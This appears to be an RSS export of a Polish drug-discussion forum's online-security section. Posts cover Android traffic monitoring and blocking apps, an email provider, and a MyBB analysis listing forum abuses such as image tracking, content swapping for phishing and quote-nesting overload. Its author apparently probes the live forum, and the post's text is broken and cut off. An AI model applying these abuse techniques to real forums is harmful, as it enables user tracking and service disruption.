<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Dopal.org - Forum Dyskusyjne o Używkach i RC - Bezpieczeństwo w sieci]]></title>
		<link>https://dopal.org/</link>
		<description><![CDATA[Dopal.org - Forum Dyskusyjne o Używkach i RC - https://dopal.org]]></description>
		<pubDate>Tue, 23 Jun 2026 16:01:22 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Android - Co wysyła w świat Twój smartfon?]]></title>
			<link>https://dopal.org/showthread.php?tid=6618</link>
			<pubDate>Sat, 04 Apr 2026 18:30:50 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=0">Rweqerew333</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=6618</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">Chciałem podzielić się kilkoma informacjami dla osób, które zastanawiają się, z czym tak naprawdę łączy się ich smartfon.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Większość osób nie zdaje sobie sprawy ile połączeń sieciowych wykonują aplikacje w tle, często bez żadnej widocznej aktywności ze strony użytkownika albo wręcz teoretycznie rozumianej potrzeby.</span><br />
<br />
<br />
Zanim zaczniesz cokolwiek blokować, warto najpierw zobaczyć, co się dzieje. Do tego polecam aplikację <span style="font-weight: bold;" class="mycode_b">PCAPdroid</span> (dostępna na F-Droid i Google Play). Pozwala ona monitorować ruch sieciowy bez roota. <br />
<br />
Widać w niej każde połączenie: z jaką domeną, na jaki port, ile danych przesłała dana aplikacja.<br />
<br />
Co możesz zobaczyć:<br />
<ul class="mycode_list"><li>Aplikacje łączące się z serwerami reklamowymi<br />
</li>
<li>Telemetria wysyłana do serwerów producenta smartfona<br />
</li>
<li>Połączenia komunikatorów i przeglądarek w tle<br />
</li>
<li>Nieznane hosty przy aplikacjach, które teoretycznie nie powinny mieć dostępu do transmisji<br />
</li>
</ul>
<br />
<br />
Wystarczy uruchomić przechwytywanie, poużywać telefonu przez kilka minut i przejrzeć listę połączeń. <br />
<br />
U mnie aplikacje, które miały wyłączoną opcję transmisji danych w ustawieniach i tak łączyły się z serwerami producenta mojego smartfona pomimo braku takiej potrzeby.<br />
<br />
Zaskoczenie tym faktem było jednym z powodów chęci podzielenia się tą - wydawało by się podstawową wiedzą związaną z używaniem przedstawianych przeze mnie aplikacji.<br />
<br />
<br />
<a href="https://ibb.co/ZDf0MX7" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/H8KjH43/1.jpg" loading="lazy"  alt="[Obrazek: 1.jpg]" class="mycode_img" /></a><br />
<br />
<a href="https://ibb.co/JFKRD3w6" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/k6xgNmsb/2.jpg" loading="lazy"  alt="[Obrazek: 2.jpg]" class="mycode_img" /></a><br />
<br />
<br />
Źródła obrazków: <a href="https://github.com/emanuele-f/PCAPdroid" target="_blank" rel="noopener" class="mycode_url">https://github.com/emanuele-f/PCAPdroid</a><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Gdy wiesz już, co się łączy, możesz to kontrolować. Do tego służy NetGuard - firewall działający bez roota, który tworzy lokalną sieć VPN i przez nią filtruje ruch aplikacji.</span><br />
<br />
Podstawowe funkcje:<ul class="mycode_list"><li>Blokowanie dostępu do internetu osobno dla Wi-Fi i dla danych mobilnych<br />
</li>
<li>Lista wszystkich aplikacji z możliwością włączenia/wyłączenia dostępu<br />
</li>
</ul>
<br />
Oprócz tego aplikacja oferuje pełno innych ciekawych opcji. Można również tutaj badać dzienniki połączeń z siecią, ale ja rozdzieliłem to na dwie aplikacje osobno ponieważ w NetGuard jest to funkcja premium - dodatkowo płatna.<br />
<br />
<br />
PCAPdroid - żeby zobaczyć połączenia<br />
<br />
NetGuard - żeby blokować połączenia<br />
<br />
<br />
<br />
<a href="https://ibb.co/kg6z5FXm" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/rGfqFJHd/01-main.png" loading="lazy"  alt="[Obrazek: 01-main.png]" class="mycode_img" /></a><br />
<br />
<br />
Źródło obrazka: <a href="https://netguard.me" target="_blank" rel="noopener" class="mycode_url">https://netguard.me</a><br />
<br />
<br />
Polecam pobawić się i sprawdzić, ale nie popadać też w paranoję - co może się zdarzyć ze względu na to że Android robi w tle mnóstwo requestów których nawet sobie nie wyobrażaliście, wyglądających wręcz jak bezsensowne. <br />
<br />
Niemniej jednak tym bardziej myślę że warto. Zazwyczaj mamy podłączony telefon do sieci non stop a niekoniecznie chcemy robić za - jak to mawiał klasyk - radiostacje.<br />
<br />
<br />
Blokuj wszystko, co nie potrzebuje internetu do działania - kalkulatory, latarki, zegary, klawiatury, galerie, gry offline i inne dziadostwa zwłaszcza te które przykuły twoją podejrzliwość w kwestii sensowności. Na przykład przeglądarka plików gdzie nie używasz chmury łączy się kiedy ją odpalasz.<br />
<br />
<br />
Chętnie odpowiem na pytania i poczytam o doświadczeniach innych userów w tym temacie. Na pewno są jakieś lepsze rozwiązania bardziej trwałe, uniwersalne. Myślę że temat jest godzien dobrej dyskusji.]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b">Chciałem podzielić się kilkoma informacjami dla osób, które zastanawiają się, z czym tak naprawdę łączy się ich smartfon.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Większość osób nie zdaje sobie sprawy ile połączeń sieciowych wykonują aplikacje w tle, często bez żadnej widocznej aktywności ze strony użytkownika albo wręcz teoretycznie rozumianej potrzeby.</span><br />
<br />
<br />
Zanim zaczniesz cokolwiek blokować, warto najpierw zobaczyć, co się dzieje. Do tego polecam aplikację <span style="font-weight: bold;" class="mycode_b">PCAPdroid</span> (dostępna na F-Droid i Google Play). Pozwala ona monitorować ruch sieciowy bez roota. <br />
<br />
Widać w niej każde połączenie: z jaką domeną, na jaki port, ile danych przesłała dana aplikacja.<br />
<br />
Co możesz zobaczyć:<br />
<ul class="mycode_list"><li>Aplikacje łączące się z serwerami reklamowymi<br />
</li>
<li>Telemetria wysyłana do serwerów producenta smartfona<br />
</li>
<li>Połączenia komunikatorów i przeglądarek w tle<br />
</li>
<li>Nieznane hosty przy aplikacjach, które teoretycznie nie powinny mieć dostępu do transmisji<br />
</li>
</ul>
<br />
<br />
Wystarczy uruchomić przechwytywanie, poużywać telefonu przez kilka minut i przejrzeć listę połączeń. <br />
<br />
U mnie aplikacje, które miały wyłączoną opcję transmisji danych w ustawieniach i tak łączyły się z serwerami producenta mojego smartfona pomimo braku takiej potrzeby.<br />
<br />
Zaskoczenie tym faktem było jednym z powodów chęci podzielenia się tą - wydawało by się podstawową wiedzą związaną z używaniem przedstawianych przeze mnie aplikacji.<br />
<br />
<br />
<a href="https://ibb.co/ZDf0MX7" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/H8KjH43/1.jpg" loading="lazy"  alt="[Obrazek: 1.jpg]" class="mycode_img" /></a><br />
<br />
<a href="https://ibb.co/JFKRD3w6" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/k6xgNmsb/2.jpg" loading="lazy"  alt="[Obrazek: 2.jpg]" class="mycode_img" /></a><br />
<br />
<br />
Źródła obrazków: <a href="https://github.com/emanuele-f/PCAPdroid" target="_blank" rel="noopener" class="mycode_url">https://github.com/emanuele-f/PCAPdroid</a><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Gdy wiesz już, co się łączy, możesz to kontrolować. Do tego służy NetGuard - firewall działający bez roota, który tworzy lokalną sieć VPN i przez nią filtruje ruch aplikacji.</span><br />
<br />
Podstawowe funkcje:<ul class="mycode_list"><li>Blokowanie dostępu do internetu osobno dla Wi-Fi i dla danych mobilnych<br />
</li>
<li>Lista wszystkich aplikacji z możliwością włączenia/wyłączenia dostępu<br />
</li>
</ul>
<br />
Oprócz tego aplikacja oferuje pełno innych ciekawych opcji. Można również tutaj badać dzienniki połączeń z siecią, ale ja rozdzieliłem to na dwie aplikacje osobno ponieważ w NetGuard jest to funkcja premium - dodatkowo płatna.<br />
<br />
<br />
PCAPdroid - żeby zobaczyć połączenia<br />
<br />
NetGuard - żeby blokować połączenia<br />
<br />
<br />
<br />
<a href="https://ibb.co/kg6z5FXm" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/rGfqFJHd/01-main.png" loading="lazy"  alt="[Obrazek: 01-main.png]" class="mycode_img" /></a><br />
<br />
<br />
Źródło obrazka: <a href="https://netguard.me" target="_blank" rel="noopener" class="mycode_url">https://netguard.me</a><br />
<br />
<br />
Polecam pobawić się i sprawdzić, ale nie popadać też w paranoję - co może się zdarzyć ze względu na to że Android robi w tle mnóstwo requestów których nawet sobie nie wyobrażaliście, wyglądających wręcz jak bezsensowne. <br />
<br />
Niemniej jednak tym bardziej myślę że warto. Zazwyczaj mamy podłączony telefon do sieci non stop a niekoniecznie chcemy robić za - jak to mawiał klasyk - radiostacje.<br />
<br />
<br />
Blokuj wszystko, co nie potrzebuje internetu do działania - kalkulatory, latarki, zegary, klawiatury, galerie, gry offline i inne dziadostwa zwłaszcza te które przykuły twoją podejrzliwość w kwestii sensowności. Na przykład przeglądarka plików gdzie nie używasz chmury łączy się kiedy ją odpalasz.<br />
<br />
<br />
Chętnie odpowiem na pytania i poczytam o doświadczeniach innych userów w tym temacie. Na pewno są jakieś lepsze rozwiązania bardziej trwałe, uniwersalne. Myślę że temat jest godzien dobrej dyskusji.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Bezpieczny email poza protonem]]></title>
			<link>https://dopal.org/showthread.php?tid=6535</link>
			<pubDate>Tue, 17 Mar 2026 15:17:35 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=1974">Bartek</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=6535</guid>
			<description><![CDATA[Co sądzicie o tej stronie?<br />
<div class="codeblock"><div class="title">Kod:</div><div class="body" dir="ltr"><code>https://mailum.com</code></div></div>Według mnie duzo lepszy od protona.<br />
zero logow, zero plikow cookie i itp.<br />
Polecam]]></description>
			<content:encoded><![CDATA[Co sądzicie o tej stronie?<br />
<div class="codeblock"><div class="title">Kod:</div><div class="body" dir="ltr"><code>https://mailum.com</code></div></div>Według mnie duzo lepszy od protona.<br />
zero logow, zero plikow cookie i itp.<br />
Polecam]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[•  -» Analiza ruchu przez obrazki, MyCode -(BBCode)]]></title>
			<link>https://dopal.org/showthread.php?tid=6511</link>
			<pubDate>Tue, 10 Mar 2026 01:08:22 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=5032">Inferno</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=6511</guid>
			<description><![CDATA[<div style="text-align: left;" class="mycode_align"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="color: #ffd700;" class="mycode_color">🔹 <span style="font-weight: bold;" class="mycode_b">Analiza bezpieczeństwa MyBB</span></span></span></span></div>
<br />
<br />
<span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">1. Wprowadzenie</span></span></span></span><br />
<span style="font-size: small;" class="mycode_size">MyBB to popularne oprogramowanie forum, które pozwala wstawiać posty przy użyciu BBCode.  </span><br />
<span style="font-size: small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #b3d5f4;" class="mycode_color">   </span></span></span><ul class="mycode_list"><li><span style="font-size: small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #b3d5f4;" class="mycode_color">Tag</span></span> -[-IMG] czyli obrazek wklejony i wyświetlany gdziekolwiek→ przeglądarka wysyła GET do serwera zewnętrznego.  </span><br />
</li>
</ul>
<br />
<span style="font-family: Trebuchet MS;" class="mycode_font"><span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff56ff;" class="mycode_color"><span style="font-size: large;" class="mycode_size">  ›</span></span></span><span style="font-size: x-small;" class="mycode_size">. </span></span><span style="font-size: small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Serwer może logować </span></span><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">IP, czas, user-agent i refere</span>r.</span></span></span><br />
<blockquote class="mycode_quote"><cite>Cytat:</cite><span style="font-size: small;" class="mycode_size">GET /picture.png HTTP/1.1  <br />
Host: example.com  <br />
User-Agent: Mozilla/5.0  <br />
Referer: <a href="https://forum.com/thread/123" target="_blank" rel="noopener" class="mycode_url">https://forum.com/thread/123</a></span></blockquote>
<span style="font-size: small;" class="mycode_size">Każdy obrazek jest więc zewnętrznym requestem, który może służyć do śledzenia aktywności użytkowników.</span><br />
<hr class="mycode_hr" />
<br />
<span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">3. Typowe nadużycia</span></span></span></span><br />
<span style="font-size: small;" class="mycode_size"><span style="color: gold;" class="mycode_color">•</span> Content Switch Attack – zmiana obrazu po publikacji np. w poradniku.  <br />
<span style="color: gold;" class="mycode_color">•</span> External Resource Manipulation – podmiana obrazów w postach lub shoutboxie.  <br />
<span style="color: gold;" class="mycode_color">•</span> Mutable external content – dynamiczny content, np. phishing wizualny lub malware.</span><br />
<hr class="mycode_hr" />
<span style="font-size: small;" class="mycode_size"><br />
<span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b"><span style="color: #17b529;" class="mycode_color">🗼</span><span style="color: #17b529;" class="mycode_color"> » </span><span style="color: #e86e04;" class="mycode_color">Przykłady scenariuszy</span></span></span><br />
- Podmiana treści posta poprzez zmianę obrazu.  <br />
- Socjotechnika: fałszywe komunikaty typu "<span style="font-style: italic;" class="mycode_i">twoje konto wygasło</span>".  <br />
- Phishing wizualny i QR code malware.  <br />
- Tracking użytkowników: <span style="text-decoration: underline;" class="mycode_u">IP</span>, referer, user-agent.  <br />
- Pixel tracking: 1×1 obrazki.  <br />
- Fingerprinting przeglądarek.  <br />
- Wymuszone zapytania HTTP do serwera atakującego.  <br />
- Podmiana obrazów na treści nielegalne.</span><br />
<hr class="mycode_hr" />
<br />
<span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">4. Problemy techniczne MyBB</span></span></span><br />
<span style="color: gold;" class="mycode_color">•</span> SQL Error 1366 – baza ustawiona na utf8, a wstawione emoji (4 bajty) np. 🎖. </span><br />
<hr class="mycode_hr" />
<blockquote class="mycode_quote"><cite>Cytat:</cite>SQL Error: 1366 - Incorrect string value '\xF0\x9F\x8E\x96...' for column 'subject'</blockquote>
<span style="font-size: small;" class="mycode_size"><span style="color: gold;" class="mycode_color">•</span> Quote bomb – zbyt głęboko zagnieżdżone [quote] spowalnia parser i obciąża CPU.  <br />
<span style="color: gold;" class="mycode_color">•</span> Duże sygnatury / shoutbox – setki requestów HTTP dla obrazków.  <br />
<span style="color: gold;" class="mycode_color">•</span> Automatyczne embedowanie linków – linki do obrazów mogą omijać limit [img].  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> BBCode flood – ogromne posty z dziesiątkami zagnieżdżonych [quote] i [img] mogą obciążyć forum.</span>&lt;br /&gt;<hr class="mycode_hr" />&lt;br /&gt;<span style="font-size: small;" class="mycode_size">&lt;br /&gt;<span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">5. Limity i zabezpieczenia</span></span></span>&lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Limit obrazów w poście: 5–15  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Limit głębokości [quote]: max quote depth = 10  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Limit sygnatur: 1–2 obrazki  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Image proxy / cache  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Whitelist hostów  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Wyłączenie HTML dla użytkowników  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Blokowanie dużych GIF  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Logowanie błędów zamiast pokazywania szczegółowych zapytań SQL</span>&lt;br /&gt;&lt;br /&gt;<span style="font-weight: bold;" class="mycode_b"><span style="color: #c19e00;" class="mycode_color"><span style="font-size: small;" class="mycode_size">·</span></span></span><span style="font-size: x-small;" class="mycode_size"> Limit załączników został poprawiony ale też można było się nadziać na duże bomby plików, gdyby ktoś wykorzystał.</span>&lt;br /&gt;<hr class="mycode_hr" />&lt;br /&gt;<span style="font-size: small;" class="mycode_size">&lt;br /&gt;<span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">6. Rekomendacje dla technika</span></span></span>&lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Zmiana bazy na utf8mb4 aby obsłużyć emoji  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Włączenie logów zamiast pokazywania błędów SQL  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Ograniczenie liczby obrazów i głębokości cytatów  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Cache i proxy dla zewnętrznych obrazów  &lt;br /&gt;<span style="color: gold;" class="mycode_color">•</span> Archiwizacja obrazów wewnętrznych zamiast polegania na linkach zewnętrznych </span>&lt;br /&gt;<hr class="mycode_hr" />&lt;br /&gt;<span style="font-size: small;" class="mycode_size">&lt;br /&gt;<span style="font-family: Arial;" class="mycode_font"><span style="color: orange;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: small;" class="mycode_size">7. Podsumowanie</span></span></span></span>&lt;br /&gt;Problemy z [-img], [-quote] i emoji w MyBB <span style="font-weight: bold;" class="mycode_b">nie są klasycznymi exploitami</span>, ale mogą:  &lt;br /&gt;</span>&lt;br /&gt;<ul class="mycode_list"><li>&lt;br /&gt;</li>
<li><span style="font-size: small;" class="mycode_size">- ujawniać strukturę <span style="font-weight: bold;" class="mycode_b">bazy SQL  </span></span>&lt;br /&gt;</li>
<li><span style="font-size: small;" class="mycode_size">- <span style="font-style: italic;" class="mycode_i">spowalniać</span> forum  </span>&lt;br /&gt;</li>
<li><span style="font-size: small;" class="mycode_size">- umożliwiać <span style="text-decoration: underline;" class="mycode_u">śledzenie użytkowników</span>  </span>&lt;br /&gt;</li>
<li><span style="font-size: small;" class="mycode_size">- służyć do manipulacji treścią  </span>&lt;br /&gt;</li>
</ul>
&lt;br /&gt;&lt;br /&gt;<div style="text-align: right;" class="mycode_align"><span style="font-style: italic;" class="mycode_i"><span style="color: #ffdc00;" class="mycode_color"><span style="font-size: x-small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Zastosowanie powyższych limitów i pluginów znacząco poprawia bezpieczeństwo i wydajność forum.</span></span></span></span></div>&lt;br /&gt;<div style="text-align: right;" class="mycode_align"><span style="font-size: x-small;" class="mycode_size">Dużo już zostało poprawione po zgłoszeniach dlatego można zamieścić to w poście i nie wygląda to jako poradnik <img src="https://dopal.org/images/smilies/wink.png" alt="Wink" title="Wink" class="smilie smilie_2" /></span></div>&lt;br /&gt;<hr class="mycode_hr" />&lt;br /&gt;Właśnie teraz wypierdziela mysql'a na stronie głównej.&lt;br /&gt;Dodaje post żeby technik mógł sprawdzić po godzinie logi później.&lt;br /&gt;<hr class="mycode_hr" />&lt;br /&gt;<img src="https://gekkk.co/storage/v/e9ab2cdef3ed99dc9a2fef5c74a90ce0.png" loading="lazy"  alt="[Obrazek: e9ab2cdef3ed99dc9a2fef5c74a90ce0.png]" class="mycode_img" />[/size]<br />
<hr class="mycode_hr" />
<hr class="mycode_hr" />
oho to ładnie się porobiło, post mi edytowalo, ucięło i tryb widoku w edycji.<br />
<br />
Kopie se niżej dodałem...<br />
<br />
<div><div class="quotetitle"><input class="button2 btnlite spoiler" type="button" value="Zobacz spoiler"  onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';      this.innerText = ''; this.value = 'Ukryj spoiler'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Zobacz spoiler'; }" /></div><div class="quotecontent"><div style="display: none;">
<div class="codeblock phpcodeblock"><div class="title">Kod PHP:</div><div class="body"><div dir="ltr"><code><span style="color: #0000BB">🔹&nbsp;Analiza&nbsp;bezpieczeństwa&nbsp;MyBB<br /><br />1.&nbsp;Wprowadzenie<br />MyBB&nbsp;to&nbsp;popularne&nbsp;oprogramowanie&nbsp;forum</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">które&nbsp;pozwala&nbsp;wstawiać&nbsp;posty&nbsp;przy&nbsp;użyciu&nbsp;BBCode</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /> &nbsp; <br />Tag&nbsp;</span><span style="color: #007700">-[-</span><span style="color: #0000BB">IMG</span><span style="color: #007700">]&nbsp;</span><span style="color: #0000BB">czyli&nbsp;obrazek&nbsp;wklejony&nbsp;i&nbsp;wyświetlany&nbsp;gdziekolwiek→&nbsp;przeglądarka&nbsp;wysyła&nbsp;GET&nbsp;</span><span style="color: #007700">do&nbsp;</span><span style="color: #0000BB">serwera&nbsp;zewnętrznego</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /><br /> &nbsp;›</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">Serwer&nbsp;może&nbsp;logować&nbsp;IP</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">czas</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">user</span><span style="color: #007700">-</span><span style="color: #0000BB">agent&nbsp;i&nbsp;referer</span><span style="color: #007700">.<br /></span><span style="color: #0000BB">Cytat</span><span style="color: #007700">:<br /></span><span style="color: #0000BB">GET&nbsp;</span><span style="color: #007700">/</span><span style="color: #0000BB">picture</span><span style="color: #007700">.</span><span style="color: #0000BB">png&nbsp;HTTP</span><span style="color: #007700">/</span><span style="color: #0000BB">1.1 <br />Host</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">example</span><span style="color: #007700">.</span><span style="color: #0000BB">com <br />User</span><span style="color: #007700">-</span><span style="color: #0000BB">Agent</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">Mozilla</span><span style="color: #007700">/</span><span style="color: #0000BB">5.0 <br />Referer</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">https</span><span style="color: #007700">:</span><span style="color: #FF8000">//forum.com/thread/123<br /></span><span style="color: #0000BB">Każdy&nbsp;obrazek&nbsp;jest&nbsp;więc&nbsp;zewnętrznym&nbsp;requestem</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">który&nbsp;może&nbsp;służyć&nbsp;</span><span style="color: #007700">do&nbsp;</span><span style="color: #0000BB">śledzenia&nbsp;aktywności&nbsp;użytkowników</span><span style="color: #007700">.<br /><br /></span><span style="color: #0000BB">3.&nbsp;Typowe&nbsp;nadużycia<br />•&nbsp;Content&nbsp;</span><span style="color: #007700">Switch&nbsp;</span><span style="color: #0000BB">Attack&nbsp;–&nbsp;zmiana&nbsp;obrazu&nbsp;po&nbsp;publikacji&nbsp;np</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">w&nbsp;poradniku</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br />•&nbsp;External&nbsp;Resource&nbsp;Manipulation&nbsp;–&nbsp;podmiana&nbsp;obrazów&nbsp;w&nbsp;postach&nbsp;lub&nbsp;shoutboxie</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br />•&nbsp;Mutable&nbsp;external&nbsp;content&nbsp;–&nbsp;dynamiczny&nbsp;content</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">np</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">phishing&nbsp;wizualny&nbsp;lub&nbsp;malware</span><span style="color: #007700">.<br /><br /></span><span style="color: #0000BB">🗼&nbsp;»&nbsp;Przykłady&nbsp;scenariuszy<br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Podmiana&nbsp;treści&nbsp;posta&nbsp;poprzez&nbsp;zmianę&nbsp;obrazu</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Socjotechnika</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">fałszywe&nbsp;komunikaty&nbsp;typu&nbsp;</span><span style="color: #DD0000">"twoje&nbsp;konto&nbsp;wygasło"</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Phishing&nbsp;wizualny&nbsp;i&nbsp;QR&nbsp;code&nbsp;malware</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Tracking&nbsp;użytkowników</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">IP</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">referer</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">user</span><span style="color: #007700">-</span><span style="color: #0000BB">agent</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Pixel&nbsp;tracking</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">1×1&nbsp;obrazki</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Fingerprinting&nbsp;przeglądarek</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Wymuszone&nbsp;zapytania&nbsp;HTTP&nbsp;</span><span style="color: #007700">do&nbsp;</span><span style="color: #0000BB">serwera&nbsp;atakującego</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br /></span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Podmiana&nbsp;obrazów&nbsp;na&nbsp;treści&nbsp;nielegalne</span><span style="color: #007700">.<br /><br /></span><span style="color: #0000BB">4.&nbsp;Problemy&nbsp;techniczne&nbsp;MyBB<br />•&nbsp;SQL&nbsp;Error&nbsp;1366&nbsp;–&nbsp;baza&nbsp;ustawiona&nbsp;na&nbsp;utf8</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">a&nbsp;wstawione&nbsp;emoji&nbsp;</span><span style="color: #007700">(</span><span style="color: #0000BB">4&nbsp;bajty</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">np</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">🎖</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br />Cytat</span><span style="color: #007700">:<br /></span><span style="color: #0000BB">SQL&nbsp;Error</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">1366&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Incorrect&nbsp;string&nbsp;value&nbsp;</span><span style="color: #DD0000">'&#092;xF0&#092;x9F&#092;x8E&#092;x96...'&nbsp;</span><span style="color: #007700">for&nbsp;</span><span style="color: #0000BB">column&nbsp;</span><span style="color: #DD0000">'subject'<br /></span><span style="color: #0000BB">•&nbsp;Quote&nbsp;bomb&nbsp;–&nbsp;zbyt&nbsp;głęboko&nbsp;zagnieżdżone&nbsp;</span><span style="color: #007700">[</span><span style="color: #0000BB">quote</span><span style="color: #007700">]&nbsp;</span><span style="color: #0000BB">spowalnia&nbsp;parser&nbsp;i&nbsp;obciąża&nbsp;CPU</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br />•&nbsp;Duże&nbsp;sygnatury&nbsp;</span><span style="color: #007700">/&nbsp;</span><span style="color: #0000BB">shoutbox&nbsp;–&nbsp;setki&nbsp;requestów&nbsp;HTTP&nbsp;dla&nbsp;obrazków</span><span style="color: #007700">.</span><span style="color: #0000BB"> <br />•&nbsp;Automatyczne&nbsp;embedowanie&nbsp;linków&nbsp;–&nbsp;linki&nbsp;</span><span style="color: #007700">do&nbsp;</span><span style="color: #0000BB">obrazów&nbsp;mogą&nbsp;omijać&nbsp;limit&nbsp;</span><span style="color: #007700">[</span><span style="color: #0000BB">img</span><span style="color: #007700">].</span><span style="color: #0000BB"> <br />•&nbsp;BBCode&nbsp;flood&nbsp;–&nbsp;ogromne&nbsp;posty&nbsp;z&nbsp;dziesiątkami&nbsp;zagnieżdżonych&nbsp;</span><span style="color: #007700">[</span><span style="color: #0000BB">quote</span><span style="color: #007700">]&nbsp;</span><span style="color: #0000BB">i&nbsp;</span><span style="color: #007700">[</span><span style="color: #0000BB">img</span><span style="color: #007700">]&nbsp;</span><span style="color: #0000BB">mogą&nbsp;obciążyć&nbsp;forum</span><span style="color: #007700">.<br /><br /></span><span style="color: #0000BB">5.&nbsp;Limity&nbsp;i&nbsp;zabezpieczenia<br />•&nbsp;Limit&nbsp;obrazów&nbsp;w&nbsp;poście</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">5–15 <br 